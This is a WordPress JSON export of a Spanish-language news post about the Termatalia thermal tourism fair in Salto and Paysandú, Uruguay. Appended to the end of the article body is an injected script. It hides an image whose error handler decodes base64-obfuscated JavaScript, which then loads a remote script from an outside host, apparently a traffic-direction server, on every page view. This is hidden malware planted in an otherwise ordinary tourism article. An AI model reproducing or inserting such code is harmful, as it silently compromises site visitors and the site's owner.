{"id":7428,"date":"2023-10-05T16:59:27","date_gmt":"2023-10-05T19:59:27","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=7428"},"modified":"2025-08-13T15:52:46","modified_gmt":"2025-08-13T18:52:46","slug":"termatalia-contribuye-a-que-destino-termas-se-posicione-como-tercer-destino-turistico-del-pais","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=7428","title":{"rendered":"Termatalia contribuye a que Destino Termas se posicione como tercer destino tur\u00edstico del pa\u00eds"},"content":{"rendered":"\n<ul class=\"wp-block-list\">\n<li><strong><em>El pa\u00eds que buscando petr\u00f3leo encontr\u00f3 agua termal se sirve de Termatalia para buscar turistas pero tambi\u00e9n inversores<\/em><\/strong><\/li>\n\n\n\n<li><strong><em>La segunda jornada de Termatalia Uruguay acogi\u00f3 el Encuentro de Pol\u00edticas P\u00fablicas de Termalismo y una sesion en Paysand\u00fa<\/em><\/strong><\/li>\n<\/ul>\n\n\n\n<p>Uruguay celebr\u00f3 hoy la segunda jornada del evento que lo sit\u00faa en el epicentro del termalismo mundial y que incluy\u00f3 una presentaci\u00f3n como \u201cDestino Pa\u00eds\u201d a los m\u00e1s de 300 participantes presenciales procedentes de 20 pa\u00edses que confluyen estos d\u00edas en los departamentos termales de Salto. El Ministerio de Turismo del Uruguay ha apostado por Termatalia para visibilizar y colocar en el mapa internacional del termalismo a su \u201cDestino Termas\u201d, marca tur\u00edstica que incluye las intendencias de Salto y Paysand\u00fa y que es a d\u00eda de hoy el tercer destino m\u00e1s visitado del pa\u00eds, tras Montevideo y Punta del Este.<\/p>\n\n\n\n<p>El ministro de Turismo uruguayo, Tabar\u00e9 Viera, celebr\u00f3 un encuentro con la prensa especializada que participa en Termatalia y destac\u00f3 el hecho de que est\u00e1n trabajando con su hom\u00f3logo argentino para poder ofrecer un destino termal binacional en torno al r\u00edo Uruguay y al Sistema Acu\u00edfero Guaran\u00ed que ser\u00eda un producto singular en el Mundo. Uruguay se ha presentado tambi\u00e9n ante los participantes en Termatalia como un pa\u00eds con gobierno estable, seguro y atractivo que lo tiene todo para convertirse en un destino termal de referencia.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000255972.jpg\"><img decoding=\"async\" width=\"1024\" height=\"683\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000255972-1024x683.jpg\" alt=\"\" class=\"wp-image-7429\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000255972-1024x683.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000255972-300x200.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000255972-768x512.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000255972-1536x1024.jpg 1536w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000255972-696x464.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000255972-1068x712.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000255972-630x420.jpg 630w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000255972-320x213.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000255972-480x320.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000255972-800x533.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000255972.jpg 1620w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<p>La segunda jornada de Termatalia Uruguay incluy\u00f3 adem\u00e1s una sesi\u00f3n de tarde celebrada en Termas de Guaviy\u00fa, en Paysand\u00fa. Su intendente, Nicol\u00e1s Olivera, hizo un repaso por la historia del termalismo en esta regi\u00f3n cuando, hace ya 67 a\u00f1os, se hicieron las primeras perforaciones en busca de petr\u00f3leo y hallaron en su lugar aguas termales. Hoy en d\u00eda es uno de los principales agentes econ\u00f3micos de esta regi\u00f3n siendo un recursos sostenible y renovable. Con su participaci\u00f3n en Termatalia, las intendencias de Salto y Paysand\u00fa buscan aumentar el n\u00famero de visitantes pero tambi\u00e9n, \u201cinversores que impulsen el desarrollo de esta regi\u00f3n y creen empleo\u201d, tal y como explic\u00f3 el Intendente de Salto, Andr\u00e9s Lima, durante la recepci\u00f3n ofrecida ayer por la noche a los participantes en Termatalia.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000255967-scaled.jpg\"><img decoding=\"async\" width=\"1024\" height=\"461\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000255967-1024x461.jpg\" alt=\"\" class=\"wp-image-7430\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000255967-1024x461.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000255967-300x135.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000255967-768x345.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000255967-1536x691.jpg 1536w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000255967-2048x921.jpg 2048w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000255967-696x313.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000255967-1068x480.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000255967-934x420.jpg 934w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000255967-320x144.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000255967-480x216.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000255967-800x360.jpg 800w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<p>Dentro de las ponencias celebradas hoy en el marco del IV Congreso Internacional sobre Agua y Salud destac\u00f3 el encuentro de pol\u00edticas termales en el que participaron cuatro ponentes espa\u00f1oles que expusieron sus experiencias en la gesti\u00f3n p\u00fablico-privada de los recursos termales y que podr\u00edan servir de gu\u00eda para el desarrollo e impulso definitivo del termalismo uruguayo. Galicia fue la protagonista de esta mesa redonda ya que tres de los 4 ponentes proced\u00edan de esta comunidad. Participaron el presidente del Cl\u00faster de Turismo de Galicia, Ces\u00e1reo Gonz\u00e1lez Pardal; la jefa del \u00c1rea de Termalismo de la Xunta de Galicia, Bel\u00e9n G\u00f3mez Quevedo, y el jefe del \u00c1rea de Benestar de la Diputaci\u00f3n Provincial de Ourense, Jos\u00e9 Juan Cerdeira. A ellos se sumo la participaci\u00f3n de Patricia Fern\u00e1ndez, alcaldesa del municipio termal murciano de Archena. Esta mesa fue moderada por Francisco Jos\u00e9 Fern\u00e1ndez, Senador de Espa\u00f1a y alcalde de la villa termal de Leiro (Ourense).<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000255974-scaled.jpg\"><img decoding=\"async\" width=\"1024\" height=\"683\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000255974-1024x683.jpg\" alt=\"\" class=\"wp-image-7431\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000255974-1024x683.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000255974-300x200.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000255974-768x512.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000255974-1536x1024.jpg 1536w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000255974-2048x1365.jpg 2048w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000255974-696x464.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000255974-1068x712.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000255974-630x420.jpg 630w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000255974-320x213.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000255974-480x320.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000255974-800x533.jpg 800w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<p>Esta jornada incluy\u00f3 adem\u00e1s con una sesi\u00f3n cient\u00edfica telem\u00e1tica coordinada entre Termatalia y la European Spas Association \u2013 ESPA, ya que los miembros de esta asociaci\u00f3n no pudieron asistir a Uruguay por estar celebrando estos mismos d\u00edas su asamblea general en Karlovy Vary.<\/p>\n\n\n\n<p>La sesi\u00f3n de tarde celebrada ya en Paysand\u00fa incluy\u00f3 una sesi\u00f3n sobre Talasoterapia, ya que en esta intendencia se ubican las \u00fanicas aguas termales saladas del pa\u00eds, Termas de Almir\u00f3n.<\/p>\n\n\n\n<p>La celebraci\u00f3n de Termatalia en Uruguay ha sido aprovechada adem\u00e1s por la vecina argentina que ha coordinado la participaci\u00f3n en la feria de m\u00e1s de 50 profesionales de su sector que est\u00e1n asistiendo como ponentes del congreso y que han recibido adem\u00e1s cursos de capacitaci\u00f3n profesional dirigidos a ellos. La jornada de ayer incluy\u00f3 adem\u00e1s una presentaci\u00f3n de las provincias termales a la treintena de medios de comunicaci\u00f3n y touroperadores que participan en esta edici\u00f3n.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Uruguay celebr\u00f3 hoy la segunda jornada del evento que lo sit\u00faa en el epicentro del termalismo mundial y que incluy\u00f3 una presentaci\u00f3n como \u201cDestino Pa\u00eds\u201d a los m\u00e1s de 300 participantes presenciales procedentes de 20 pa\u00edses que confluyen estos d\u00edas en los departamentos termales de Salto. El Ministerio de Turismo del Uruguay ha apostado por [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":7431,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[29,17],"tags":[],"class_list":["post-7428","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-datos-utiles","category-turismo-termal"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7428","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7428"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7428\/revisions"}],"predecessor-version":[{"id":10294,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7428\/revisions\/10294"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/7431"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7428"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7428"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7428"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}